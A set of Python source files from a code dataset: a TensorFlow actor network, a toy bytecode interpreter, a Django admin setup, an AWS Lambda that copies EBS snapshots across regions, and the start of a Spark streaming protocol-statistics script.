inp_state,action_gradients#,is_training#,replay_buffer_mask\n \n def model(self,inp_state,scope='actor_model'):\n with tf.variable_scope(scope):\n batch_norm_params = {'is_training': self.is_training}\n net = slim.fully_connected(inp_state,self.num_hidden,normalizer_fn=slim.batch_norm,normalizer_params = batch_norm_params,\n weights_regularizer=slim.l2_regularizer(0.0),scope='fc1') # (N,num_hidden)\n net = slim.dropout(net,keep_prob=.1,is_training=self.is_training)\n #net = slim.batch_norm(net,is_training=self.is_training)\n net = slim.fully_connected(net,self.num_hidden,#normalizer_fn=slim.batch_norm,normalizer_params = batch_norm_params,\n weights_regularizer=slim.l2_regularizer(0.0),scope='fc2') # (N,num_hidden)\n net = slim.dropout(net,keep_prob=.1,is_training=self.is_training)\n net = slim.fully_connected(net,self.num_hidden,normalizer_fn=slim.batch_norm,normalizer_params = batch_norm_params,\n weights_regularizer=slim.l2_regularizer(0.0),scope='fc3') # (N,num_hidden)\n net = slim.dropout(net,keep_prob=.1,is_training=self.is_training)\n #net = slim.batch_norm(net,is_training=self.is_training)\n if self.single_rotor_control:\n net = slim.fully_connected(net,1,activation_fn=tf.sigmoid,scope='fc4') # (N,1)\n mask = tf.ones([1,self.action_size])\n net = tf.multiply(net,mask) #(N,action_size)\n else:\n net = slim.fully_connected(net,self.action_size,activation_fn=tf.sigmoid,scope='fc4') # (N,action_size)\n net = tf.multiply(net,self.action_range) + self.action_low # map from [0,1] to action ranges\n return net\n \n def loss(self,actions,action_gradients,replay_buffer_mask=None):\n with tf.name_scope('actor_loss'):\n actor_loss = tf.reduce_mean(-actions*action_gradients)\n return actor_loss\n \n def optimizer(self,loss,learning_rate=1e-4):\n with tf.name_scope('actor_optimizer'):\n #train_op = tf.train.AdamOptimizer(learning_rate)#.minimize(loss)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients, variables = zip(*optimizer.compute_gradients(loss))\n gradients, _ = tf.clip_by_global_norm(gradients, 1.0)\n train_op = optimizer.apply_gradients(zip(gradients, variables))\n return train_op\n \n def build_model(self):\n self.inp_state,self.action_gradients = self.inputs()\n self.actions = self.model(self.inp_state)\n self.actor_loss = self.loss(self.actions,self.action_gradients)\n self.opt = self.optimizer(self.actor_loss)","sub_path":"agents/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98093761","text":"import dis\r\nimport sys\r\nimport operator\r\n\r\n\r\nclass Stack(object):\r\n def __init__(self):\r\n self.values = []\r\n\r\n def push(self, elem):\r\n self.values.append(elem)\r\n\r\n def pop(self):\r\n return self.values.pop()\r\n\r\n def top(self):\r\n return self.values[-1]\r\n\r\n def popn(self, n):\r\n toplist = []\r\n for elem_number in range(n):\r\n toplist.append(self.pop())\r\n return tuple(toplist[::-1])\r\n\r\n def deep_top(self, depth):\r\n return self.values[-depth]\r\n\r\n\r\nclass Instruction(object):\r\n def __init__(self, _opcode, _opname, _arg):\r\n self.opcode = _opcode\r\n self.opname = _opname\r\n self.arg = _arg\r\n\r\n\r\nclass Function(object):\r\n def __init__(self, _name, _code, _default_args):\r\n self.name = _name\r\n self.code = _code\r\n self.default_args = _default_args\r\n\r\n def __call__(self, *args, **kwargs):\r\n vm = VirtualMachine()\r\n merged_args = list(args) + list(self.default_args)\r\n return vm.run_code(self.code, *merged_args, **kwargs)\r\n\r\n\r\nclass VirtualMachine(object):\r\n def __init__(self):\r\n self.stack = Stack()\r\n self.values = []\r\n self.instr_dict = {}\r\n self.blocks = Stack()\r\n self.varnames = []\r\n self.varvalues = []\r\n\r\n def parse_argument(self, arg):\r\n high_arg = arg // 256\r\n low_arg = arg % 256\r\n\r\n return high_arg, low_arg\r\n\r\n def parse_instructions(self, code_object):\r\n for instr in dis.get_instructions(code_object):\r\n self.instr_dict[instr.offset] = Instruction(\r\n instr.opcode,\r\n instr.opname,\r\n instr.arg\r\n )\r\n\r\n def run_code(self, code_object, *external_args, **external_kwargs):\r\n self.names = code_object.co_names\r\n self.consts = code_object.co_consts\r\n self.varnames = code_object.co_varnames\r\n\r\n tail_len = len(self.varnames) - len(external_args)\r\n self.varvalues = list(external_args) + tail_len * [None]\r\n\r\n for key, value in external_kwargs.items():\r\n for varname_ind in range(len(self.varnames)):\r\n if self.varnames[varname_ind] == key:\r\n self.varvalues[varname_ind] = value\r\n break\r\n\r\n for name in self.names:\r\n if name in dir(globals()['__builtins__']):\r\n func = getattr(globals()['__builtins__'], name)\r\n self.values.append(func)\r\n else:\r\n self.values.append(name)\r\n\r\n self.parse_instructions(code_object)\r\n self.instr_offset = 0\r\n while self.instr_offset in self.instr_dict:\r\n current_instr = self.instr_dict[self.instr_offset]\r\n\r\n # dangerous!!!\r\n if current_instr.opname == 'RETURN_VALUE':\r\n return self.stack.pop()\r\n\r\n self.exec_instruction(current_instr)\r\n if current_instr.opcode >= dis.HAVE_ARGUMENT:\r\n self.instr_offset += 3\r\n else:\r\n self.instr_offset += 1\r\n\r\n def exec_instruction(self, instr):\r\n\r\n if instr.opname in self.UNARY_OP_DICT:\r\n self.unary_operation(instr.opname)\r\n\r\n elif instr.opname in self.BINARY_OP_DICT:\r\n self.binary_operation(instr.opname)\r\n\r\n elif instr.opname in self.INPLACE_OP_DICT:\r\n self.inplace_operation(instr.opname)\r\n\r\n elif instr.opcode < dis.HAVE_ARGUMENT:\r\n try:\r\n getattr(self, instr.opname)()\r\n except:\r\n # print('Not implemented: {}'.format(instr.opname))\r\n pass\r\n\r\n elif instr.opcode >= dis.HAVE_ARGUMENT:\r\n try:\r\n getattr(self, instr.opname)(instr.arg)\r\n except:\r\n # print('Not implemented with args: {}'.format(instr.opname))\r\n pass\r\n\r\n# main\r\n def LOAD_CONST(self, number):\r\n self.stack.push(self.consts[number])\r\n\r\n def STORE_NAME(self, name):\r\n self.values[name] = self.stack.pop()\r\n\r\n def LOAD_NAME(self, name):\r\n self.stack.push(self.values[name])\r\n\r\n def LOAD_ATTR(self, name):\r\n first = self.stack.pop()\r\n self.stack.push(getattr(first, self.names[name]))\r\n\r\n# DON\"T SURE\r\n def DELETE_NAME(self, name):\r\n self.values[name] = None\r\n\r\n def LOAD_FAST(self, number):\r\n self.stack.push(self.varvalues[number])\r\n\r\n def STORE_FAST(self, name):\r\n self.varvalues[name] = self.stack.pop()\r\n\r\n def DELETE_FAST(self, name):\r\n self.varvalues[name] = None\r\n\r\n# stack\r\n def NOP(self):\r\n pass\r\n\r\n def POP_TOP(self):\r\n self.stack.pop()\r\n\r\n '''Returns with TOS to the caller of the function'''\r\n def RETURN_VALUE(self):\r\n self.stack.pop()\r\n\r\n '''Swaps the two top-most stack items.'''\r\n def ROT_TWO(self):\r\n first = self.stack.pop()\r\n second = self.stack.pop()\r\n self.stack.push(first)\r\n self.stack.push(second)\r\n\r\n '''Lifts second and third stack item one position up,\r\n moves top down to position three.'''\r\n def ROT_THREE(self):\r\n third, second, first = self.stack.popn(3)\r\n self.stack.push(first)\r\n self.stack.push(third)\r\n self.stack.push(second)\r\n\r\n '''Duplicates the reference on top of the stack.'''\r\n def DUP_TOP(self):\r\n self.stack.push(self.stack.top())\r\n\r\n '''Duplicates the two references on top of the stack,\r\n leaving them in the same order.'''\r\n def DUP_TOP_TWO(self):\r\n second = self.stack.pop()\r\n first = self.stack.top()\r\n self.stack.push(second)\r\n self.stack.push(first)\r\n self.stack.push(second)\r\n\r\n# unary\r\n UNARY_OP_DICT = {\r\n 'UNARY_POSITIVE': operator.pos,\r\n 'UNARY_NEGATIVE': operator.neg,\r\n 'UNARY_NOT': operator.not_,\r\n 'UNARY_CONVERT': repr,\r\n 'UNARY_INVERT': operator.invert,\r\n }\r\n '''Unary operations take the top of the stack, apply the operation,\r\n and push the result back on the stack'''\r\n def unary_operation(self, opname):\r\n first = self.stack.pop()\r\n self.stack.push(self.UNARY_OP_DICT[opname](first))\r\n\r\n# binary\r\n BINARY_OP_DICT = {\r\n 'BINARY_POWER': pow,\r\n 'BINARY_MULTIPLY': operator.mul,\r\n 'BINARY_FLOOR_DIVIDE': operator.floordiv,\r\n 'BINARY_TRUE_DIVIDE': operator.truediv,\r\n 'BINARY_MODULO': operator.mod,\r\n 'BINARY_ADD': operator.add,\r\n 'BINARY_SUBTRACT': operator.sub,\r\n 'BINARY_SUBSCR': operator.getitem,\r\n 'BINARY_LSHIFT': operator.lshift,\r\n 'BINARY_RSHIFT': operator.rshift,\r\n 'BINARY_AND': operator.and_,\r\n 'BINARY_XOR': operator.xor,\r\n 'BINARY_OR': operator.or_,\r\n }\r\n\r\n '''Binary operations remove the top of the stack (TOS)\r\n and the second top-most stack item (TOS1) from the stack.\r\n They perform the operation, and put the result back on the stack.'''\r\n def binary_operation(self, opname):\r\n second = self.stack.pop()\r\n first = self.stack.pop()\r\n self.stack.push(self.BINARY_OP_DICT[opname](first, second))\r\n\r\n# inplace\r\n INPLACE_OP_DICT = {\r\n 'INPLACE_POWER': operator.ipow,\r\n 'INPLACE_MULTIPLY': operator.imul,\r\n 'INPLACE_FLOOR_DIVIDE': operator.ifloordiv,\r\n 'INPLACE_TRUE_DIVIDE': operator.itruediv,\r\n 'INPLACE_MODULO': operator.imod,\r\n 'INPLACE_ADD': operator.iadd,\r\n 'INPLACE_SUBTRACT': operator.isub,\r\n 'INPLACE_LSHIFT': operator.lshift,\r\n 'INPLACE_RSHIFT': operator.rshift,\r\n 'INPLACE_AND': operator.iand,\r\n 'INPLACE_XOR': operator.ixor,\r\n 'INPLACE_OR': operator.ior,\r\n }\r\n\r\n def inplace_operation(self, opname):\r\n second = self.stack.pop()\r\n first = self.stack.pop()\r\n self.stack.push(self.INPLACE_OP_DICT[opname](first, second))\r\n\r\n '''Implements TOS1[TOS] = TOS2.'''\r\n def STORE_SUBSCR(self):\r\n tos2, tos1, tos = self.stack.popn(3)\r\n tos1[tos] = tos2\r\n\r\n '''Implements del TOS1[TOS]'''\r\n def DELETE_SUBSCR(self):\r\n tos1, tos = self.stack.popn(2)\r\n del tos1[tos]\r\n\r\n# functions\r\n def MAKE_FUNCTION(self, arg):\r\n qualified_name = self.stack.pop()\r\n function_code = self.stack.pop()\r\n kwargs_num, args_num = self.parse_argument(arg)\r\n default_args = self.stack.popn(args_num)\r\n func = Function(\r\n qualified_name,\r\n function_code,\r\n default_args,\r\n )\r\n self.stack.push(func)\r\n\r\n def CALL_FUNCTION(self, arg):\r\n kwargs_num, args_num = self.parse_argument(arg)\r\n kwargs = {}\r\n for kwarg in range(kwargs_num):\r\n value = self.stack.pop()\r\n key = self.stack.pop()\r\n kwargs[key] = value\r\n args = [self.stack.pop() for arg in range(args_num)][::-1]\r\n func = self.stack.pop()\r\n res = func(*args, **kwargs)\r\n self.stack.push(res)\r\n\r\n# compare\r\n COMP_OP_LIST = [\r\n operator.lt,\r\n operator.le,\r\n operator.eq,\r\n operator.ne,\r\n operator.gt,\r\n operator.ge,\r\n lambda x, y: x in y,\r\n lambda x, y: x not in y,\r\n lambda x, y: x is y,\r\n lambda x, y: x is not y,\r\n lambda x, y: issubclass(x, Exception) and issubclass(x, y),\r\n ]\r\n\r\n def COMPARE_OP(self, compare_type):\r\n second = self.stack.pop()\r\n first = self.stack.pop()\r\n self.stack.push(self.COMP_OP_LIST[compare_type](first, second))\r\n\r\n # jumps\r\n def JUMP_FORWARD(self, delta):\r\n self.instr_offset += (delta - 3)\r\n\r\n def POP_JUMP_IF_TRUE(self, target):\r\n if self.stack.pop():\r\n self.instr_offset = target - 3\r\n\r\n def POP_JUMP_IF_FALSE(self, target):\r\n if not self.stack.pop():\r\n self.instr_offset = target - 3\r\n\r\n def JUMP_IF_TRUE_OR_POP(self, target):\r\n if self.stack.top():\r\n self.instr_offset = target - 3\r\n else:\r\n self.stack.pop()\r\n\r\n def JUMP_IF_FALSE_OR_POP(self, target):\r\n if not self.stack.top():\r\n self.instr_offset = target - 3\r\n else:\r\n self.stack.pop()\r\n\r\n def JUMP_ABSOLUTE(self, target):\r\n self.instr_offset = target - 3\r\n\r\n # loops\r\n def SETUP_LOOP(self, arg):\r\n # after pop block will be +3\r\n self.blocks.push(self.instr_offset + arg + 2)\r\n\r\n def POP_BLOCK(self, arg):\r\n self.blocks.pop()\r\n\r\n def GET_ITER(self):\r\n self.stack.push(iter(self.stack.pop()))\r\n\r\n def FOR_ITER(self, arg):\r\n try:\r\n value = self.stack.values[-1].__next__()\r\n self.stack.push(value)\r\n\r\n except StopIteration:\r\n self.stack.pop()\r\n self.instr_offset += arg\r\n\r\n def CONTINUE_LOOP(self, target):\r\n self.instr_offset = target\r\n\r\n def BREAK_LOOP(self):\r\n self.instr_offset = self.blocks.pop()\r\n\r\n # Building\r\n def BUILD_TUPLE(self, count):\r\n elements = self.stack.popn(count)\r\n self.stack.push(tuple(elements))\r\n\r\n def BUILD_LIST(self, count):\r\n elements = self.stack.popn(count)\r\n self.stack.push(list(elements))\r\n\r\n def BUILD_SET(self, count):\r\n elements = self.stack.popn(count)\r\n self.stack.push(set(elements))\r\n\r\n def BUILD_MAP(self, size):\r\n self.stack.push({})\r\n\r\n def BUILD_SLICE(self, arg):\r\n first = self.stack.pop()\r\n second = self.stack.pop()\r\n if arg == 2:\r\n self.stack.push(slice(second, first))\r\n if arg == 3:\r\n third = self.stack.pop()\r\n self.stack.push(slice(third, second, first))\r\n\r\n # adding to structures, but i don't know, when it used\r\n '''Calls set.add(TOS1[-i], TOS). Used to implement set comprehensions'''\r\n def SET_ADD(self, arg):\r\n element = self.stack.pop()\r\n target_set = self.stack.deep_top(arg)\r\n set.add(target_set, element)\r\n\r\n '''Calls list.append(TOS[-i], TOS).\r\n Used to implement list comprehensions.'''\r\n def LIST_APPEND(self, arg):\r\n element = self.stack.pop()\r\n target_list = self.stack.deep_top(arg)\r\n list.append(target_list, element)\r\n\r\n '''Calls dict.setitem(TOS1[-i], TOS, TOS1).\r\n Used to implement dict comprehensions'''\r\n def MAP_ADD(self, arg):\r\n key = self.stack.pop()\r\n value = self.stack.pop()\r\n target_dict = self.stack.deep_top(arg)\r\n dict.__setitem__(target_dict, key, value)\r\n\r\n # other struct operations\r\n '''Store a key and value pair in a dictionary.\r\n Pops the key and value while leaving the dictionary on the stack'''\r\n def STORE_MAP(self):\r\n target_dict, value, key = self.stack.popn(3)\r\n target_dict[key] = value\r\n self.stack.push(target_dict)\r\n\r\n '''Unpacks TOS into count individual values,\r\n which are put onto the stack right-to-left'''\r\n def UNPACK_SEQUENCE(self, count):\r\n seq = self.stack.pop()\r\n for element in reversed(seq):\r\n self.stack.push(element)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n compiled = compile(sys.stdin.read(), '', 'exec')\r\n VirtualMachine().run_code(compiled)\r\n","sub_path":"stable_vm.py","file_name":"stable_vm.py","file_ext":"py","file_size_in_byte":13260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"388054598","text":"from django.contrib import admin\nfrom tasks.models import Task , Tag\n\nclass TagAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields':['name']})\n ]\n\n\nclass TaskAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields':['name']}),\n ('Author', {'fields':['author']}),\n ('Basic Info', {'fields':['rating', 'price','latitude', 'longitude']}),\n ('Image', {'fields':['thumbnail']}),\n ('Description', {'fields':['description']})\n ]\n\n list_display = ('name', 'author', 'price')\n list_filter = ['name', 'author', 'price']\n search_fields = ['name', 'price']\n\nadmin.site.register(Tag, TagAdmin)\nadmin.site.register(Task, TaskAdmin)\n","sub_path":"wsgi/openshift/tasks/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"480154134","text":"################################################################\n# This script copies every snapshot from us-west-2 to us-west-1\n# Python 3.7\n################################################################\n\nimport boto3\nimport time\nimport re\nfrom datetime import datetime, timedelta, timezone\nimport botocore\n\n\n######################\n# Global variables. #\n######################\n\nCOPY_DEFINITIONS = [\n {\n \"Source\" : \"us-east-2\",\n \"Destination\" : \"us-east-1\"\n }#,\n #{\n # \"Source\" : \"us-west-2\",\n # \"Destination\" : \"us-west-1\"\n #}#,\n # etcetera\n]\n\nACCOUNT = \"728679744102\"\n\n#SysAdmin-AWS@doxcelerate.com\nEMAIL_SENDER = \"SysAdmin-AWS@doxcelerate.com\"\nEMAIL_RECIPIENT = \"SysAdmin-AWS@doxcelerate.com\"\n\nEMAIL_REGION = \"us-east-1\"\nTOPIC_ARN = \"arn:aws:sns:us-east-1:728679744102:EmailsToSend\"\n\nEC2_RESOURCE = boto3.resource('ec2')\n\nSNS = boto3.resource('sns')\nEMAIL_TOPIC = SNS.Topic(TOPIC_ARN)\n\n######################################################################################\n# Boto3 documentation.\n# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html\n######################################################################################\n# Original function (lots of typos and errors, basically it's not working)\n# https://timesofcloud.com/aws-lambda-copy-5-snapshots-between-region/\n######################################################################################\n\ndef delete_rule(context):\n events_client = boto3.client('events') \n lambda_client = boto3.client('lambda')\n\n lambda_client.remove_permission(\n FunctionName=context.function_name,\n StatementId=\"{0}-Event\".format(context.function_name)\n )\n events_client.remove_targets( \n Rule=\"{0}-Trigger\".format(context.function_name), \n Ids=[ \n '1', \n ] \n ) \n events_client.delete_rule( \n Name=\"{0}-Trigger\".format(context.function_name) \n )\n\ndef my_send_email(subject, message): \n print (\"DOX-INFO : Sending email.\") \n try: \n EMAIL_TOPIC.publish( \n Subject = subject, \n Message = message \n ) \n print (\"DOX-INFO : Email sent.\") \n except Exception as err: \n print (err) \n\ndef handle_error(email_subject, resource_type, resource_info, action, region, error):\n my_send_email(\n subject = email_subject,\n message = r\"\"\"\n {\n \"sender\": \"Sender Name <%s>\",\n \"recipient\":\"%s\",\n \"aws_region\":\"%s\",\n \"body\": \"Resource Type : %s \\nResource : %s \\nRegion : %s \\nAction : %s \\nError : %s\"\n }\n \"\"\" % (EMAIL_SENDER, EMAIL_RECIPIENT, EMAIL_REGION, resource_type, resource_info, region, action, error)\n )\n print(\"DOX-ERROR : Resource Type : %s . Resource Id : %s . Region : %s . Process : %s . Error : %s\" % (resource_type, resource_info, region, action, error))\n\nclass EC2WorkUnit(object):\n ''' This class represents a work unit for processing the copy of the snapshots on various regions.\n '''\n\n def __init__(self, region_source, region_dest):\n self.region_source = region_source\n self.region_dest = region_dest\n\n self.ec2_source = boto3.client('ec2', region_name=region_source)\n self.ec2_dest = boto3.client('ec2', region_name=region_dest)\n \n self.snapshots = []\n self.init_snapshots_list()\n\n def sort_snapshots_by_time(self, snapshots):\n snapshots.sort(key=lambda r:r[\"StartTime\"] , reverse=True)\n return snapshots\n\n def get_snapshots_on_region_source(self):\n # https://boto3.amazonaws.com/v1/documentation/api/1.9.42/reference/services/ec2.html#EC2.Client.describe_snapshots\n response = self.ec2_source.describe_snapshots(\n Filters=[{ 'Name': 'status', 'Values': ['completed']}],\n OwnerIds=[\n ACCOUNT,\n ],\n )\n return response[\"Snapshots\"]\n\n def init_snapshots_list(self):\n nb_snapshot_to_copy = 0\n snapshots = self.get_snapshots_on_region_source()\n snapshots_sorted = self.sort_snapshots_by_time(snapshots)\n\n for snapshot in snapshots_sorted:\n if MyEbsSnapshot.is_copied(snapshot[\"SnapshotId\"]) == False:\n s = MyEbsSnapshot(snapshot[\"SnapshotId\"], self.region_source)\n self.snapshots.append(s)\n nb_snapshot_to_copy = nb_snapshot_to_copy + 1\n else:\n continue\n \n if nb_snapshot_to_copy == 10:\n break\n \n print(\"DOX-START : \" + str(nb_snapshot_to_copy) + \" EBS snapshots about to be copied from \" + self.region_source)\n return nb_snapshot_to_copy\n \n # Returns the id of the snapshot just created\n def copy_snapshot(self, old_snapshot):\n\n try:\n print (\"DOX-START: Copying.. snapshot_id: \" + old_snapshot.id + \", from: \" + self.region_source + \", to: \" + self.region_dest)\n copy_response = self.ec2_dest.copy_snapshot(\n Description = old_snapshot.get_description_for_new_snapshot(),\n SourceRegion = self.region_source,\n SourceSnapshotId = old_snapshot.id,\n DryRun=False\n )\n new_id = copy_response[\"SnapshotId\"]\n new_snapshot = MyEbsSnapshot(new_id, self.region_dest)\n new_snapshot.copy_tags_from_old(old_snapshot)\n print(\"DOX-SUCCESS: Snapshot \" + str(old_snapshot.id) + \" successfully copied\")\n return True\n \n except botocore.exceptions.ClientError as e:\n # 5 snapshot limit reached\n if e.response['Error']['Code'] == \"ResourceLimitExceeded\":\n raise e\n # For every other clienterror \n else:\n print(e)\n handle_error( email_subject=\"EBS Snapshot copy failed\", resource_type=\"EBS Snapshot\", resource_info=old_snapshot.id, region=self.region_source, action= \"Copy cross region\", error=str(e) )\n return False\n\n except Exception as e:\n print(e)\n handle_error( email_subject=\"EBS Snapshot copy failed\", resource_type=\"EBS Snapshot\", resource_info=old_snapshot.id, region=self.region_source, action= \"Copy cross region\", error=str(e) )\n return False\n\n def copy_snapshots(self):\n nb_snapshots_copied = 0\n\n for snapshot in self.snapshots:\n try:\n copy_response = self.copy_snapshot(snapshot)\n if copy_response == False:\n continue\n nb_snapshots_copied = nb_snapshots_copied + 1\n \n except Exception as e:\n print(\"DOX-INFO: \" + str(nb_snapshots_copied) + \" snapshots copied\")\n raise e\n\n print(\"DOX-INFO : \" + str(nb_snapshots_copied) + \" snapshots copied.\")\n print(\"DOX-FINAL RESULT : No more snapshots to copy on \" + self.region_source) \n return 0\n\nclass MyEbsSnapshot(object):\n ''' This class is an extension of the boto3 Snapshot class allowing actions on these snapshots on AWS.\n '''\n\n def __init__(self, snapshot_id, region):\n self.ec2_client = boto3.client('ec2', region_name = region)\n self.region = region\n\n self.aws_snapshot_interface = EC2_RESOURCE.Snapshot(snapshot_id) \n self.id = snapshot_id\n self.instance_name = \"\"\n\n self.init_tags()\n \n @staticmethod\n def is_copied(snapshot_id):\n pattern = re.compile(\"^sc-\")\n\n snapshot = EC2_RESOURCE.Snapshot(snapshot_id) \n try:\n for tag in snapshot.tags:\n # Checking if it is a destination snapshot (a copy)\n if tag['Key'] == 'Name':\n test_match = pattern.match(tag['Value'])\n if test_match != None:\n return True\n \n # Checking if it is a source snapshot and if it has already been copied\n if tag['Key'] == 'BackupCrossRegion' and tag['Value'] == 'Done':\n return True\n except:\n pass\n return False\n\n # init_tags() makes sure there is at least one tag \n def init_tags(self):\n try:\n if self.aws_snapshot_interface.tags == []:\n self.create_tag(\"BackupCrossRegion\", \"Waiting\")\n \n if (next((item for item in self.aws_snapshot_interface.tags if item['Key'] == 'BackupCrossRegion'), False) == False):\n self.create_tag('BackupCrossRegion', 'Waiting')\n \n except Exception as err:\n pass\n\n def create_tag(self, key, value):\n #print (\"Creating tag - \" + key + \":\" + value + \", snapshot_id: \" + str(self.id))\n self.ec2_client.create_tags(\n Resources=[ self.id ], \n Tags=[{'Key': key, 'Value':value},] \n )\n\n def delete_tag(self, key, value):\n #print (\"Deleting tag - \" + key + \":\" + value + \", snapshot_id: \" + str(self.id))\n self.ec2_client.delete_tags(\n Resources=[ self.id ], \n Tags=[{'Key': key, 'Value':value},] \n )\n \n def copy_tags_from_old(self, old_snapshot):\n #Copying tags from original snapshot to new snapshot\n\n for tag in old_snapshot.aws_snapshot_interface.tags:\n try:\n self.create_tag(tag[\"Key\"], tag[\"Value\"])\n except:\n continue\n \n self.delete_tag('BackupCrossRegion', 'Waiting')\n\n copy_name = \"sc-\" + old_snapshot.instance_name + \"-\" + old_snapshot.aws_snapshot_interface.start_time.strftime(\"%Y-%m-%d-%Hh%Mm\")\n \n self.create_tag('Name', copy_name)\n self.create_tag('SnapshotType', 'AutomatedCopyCrossRegion')\n self.create_tag('OriginalSnapshotID', old_snapshot.id)\n \n old_snapshot.delete_tag('BackupCrossRegion', 'Waiting')\n old_snapshot.create_tag('BackupCrossRegion', 'Done')\n\n return self.id\n \n def get_snapshot_description(self):\n try:\n description = self.aws_snapshot_interface.description\n except:\n description = \"Snapshot Description not found.\"\n return description\n\n def get_volume_attachments(self, volume_id):\n response = self.ec2_client.describe_volumes( \n VolumeIds=[ volume_id, ],\n )\n volume = EC2_RESOURCE.Volume(volume_id)\n if volume.attachments == []:\n attachments = []\n attachments[0] = {}\n attachments[0][\"InstanceId\"] = \"Undefined\"\n attachments[0][\"Device\"] = \"NotFound\"\n else:\n attachments = volume.attachments \n return attachments\n\n def init_instance_name(self, instance=None):\n instance_name = \"\"\n try:\n for tag in instance.tags:\n if tag[\"Key\"] == \"Name\":\n instance_name = tag[\"Value\"]\n except:\n instance_name = \"Ec2NotFound\"\n else:\n if instance_name == \"\":\n instance_name = \"Ec2NameUndefined\"\n\n self.instance_name = instance_name\n \n # Builds the description for the copy/new snapshot on destination region\n def get_description_for_new_snapshot(self):\n new_description = \"\"\n try:\n # If the volume_id is valid it will return information about the ec2\n # or initialize attachments with defaults values.\n attachments = self.get_volume_attachments(self.aws_snapshot_interface.volume_id)\n except:\n # default values if volume_id is not valid\n attachments = []\n attachments[0] = {}\n attachments[0][\"InstanceId\"] = \"Undefined\"\n attachments[0][\"Device\"] = \"NotFound\"\n \n #print(attachments)\n try:\n ec2_instance = EC2_RESOURCE.Instance(attachments[0][\"InstanceId\"])\n except:\n #init the instance name with a default value.\n self.instance_name = \"Ec2NotFound\" \n ec2_instance_type = \"NotFound\"\n else:\n self.init_instance_name(ec2_instance) \n ec2_instance_type = ec2_instance.instance_type\n\n new_description = new_description + \"Ec2Name: \" + self.instance_name + \", BlockDevice: \" + attachments[0][\"Device\"] + \", InstanceType: \" + ec2_instance_type\n\n #print(new_description)\n return new_description\n \ndef lambda_handler(event, context):\n # rule => CloudWatch Rule triggering this function every x minutes\n delete_rule_flag = True\n\n for copy_definition in COPY_DEFINITIONS:\n work_unit = EC2WorkUnit(copy_definition[\"Source\"], copy_definition[\"Destination\"]) \n \n try:\n copy_response = work_unit.copy_snapshots()\n\n except botocore.exceptions.ClientError as e:\n # If the limit of snapshot copies is reached :\n if e.response['Error']['Code'] == \"ResourceLimitExceeded\":\n delete_rule_flag = False\n\n if delete_rule_flag == True:\n delete_rule(context)\n print(\"DOX-Rule deleted.\")\n","sub_path":"snapshots-auto-copy/self-triggered-copies/ebs-copy.py","file_name":"ebs-copy.py","file_ext":"py","file_size_in_byte":13247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"435852253","text":"# -*- coding: utf-8 -*-\n\n#\n# MIT License\n#\n# Copyright (c) 2016 Milan Cermak , Institute of Computer Science, Masaryk University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n\"\"\"\n Counts number of flows, packets, and bytes for TCP, UDP, and other flows received from Kafka every 10 seconds.\n\n Usage:\n protocols_statistics.py -iz : -it -oh :\n\n To run this on the Stream4Flow, you need to receive flows by IPFIXCol and make them available via Kafka topic. Then\n you can run the example\n $ ./run-application.sh ./examples/protocols_statistics.py -iz producer:2181 -it ipfix.entry -oh consumer:20101\n\"\"\"\n\n\nimport sys # Common system functions\nimport os # Common operating system functions\nimport argparse # Arguments parser\nimport ujson as json # Fast JSON parser\nimport socket # Socket interface\n\nfrom termcolor import cprint # Colors in the console output\n\nfrom pyspark import SparkContext # Spark API\nfrom pyspark.streaming import StreamingContext # Spark streaming API\nfrom pyspark.streaming.kafka import KafkaUtils # Spark streaming Kafka receiver\n\n\ndef send_data(data, output_host):\n \"\"\"\n Send given data to the specified host using standard socket interface.\n\n :param data: data to send\n :param output_host: data receiver in the \"hostname:port\" format\n \"\"\"\n\n # Split outputHost hostname and port\n host = output_host.split(':')\n\n # Prepare a TCP socket.\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect to the outputHost and send given data\n try:\n sock.connect((host[0], int(host[1])))\n sock.send(data)\n except socket.error:\n cprint(\"[warning] Unable to connect to host \" + output_host, \"blue\")\n finally:\n sock.close()\n\n\ndef process_results(results, output_host):\n \"\"\"\n Transform given computation results into the JSON format and send them to the specified host.\n\n JSON format:\n {\"@type\": \"protocols_statistics\", \"protocol\" : , \"flows\": <#flows>, \"packets\": <#packets>, \"bytes\": <#bytes>}\n\n :param results: map of UDP, TCP, and other statistics (\"protocol\", (#flows, #packets, #bytes))\n :param output_host: results receiver in the \"hostname:port\" format\n \"\"\"\n\n # Transform given results into the JSON\n output_json = \"\"\n for key, value in results.iteritems():\n output_json += \"{\\\"@type\\\": \\\"protocols_statistics\\\", \\\"protocol\\\": \\\"\" + key + \"\\\", \\\"flows\\\": \" + str(value[0]) + \", \\\"packets\\\": \" + str(value[1]) + \", \\\"bytes\\\": \" + str(value[2]) + \"}\\n\"\n\n # Check if there are any results\n if 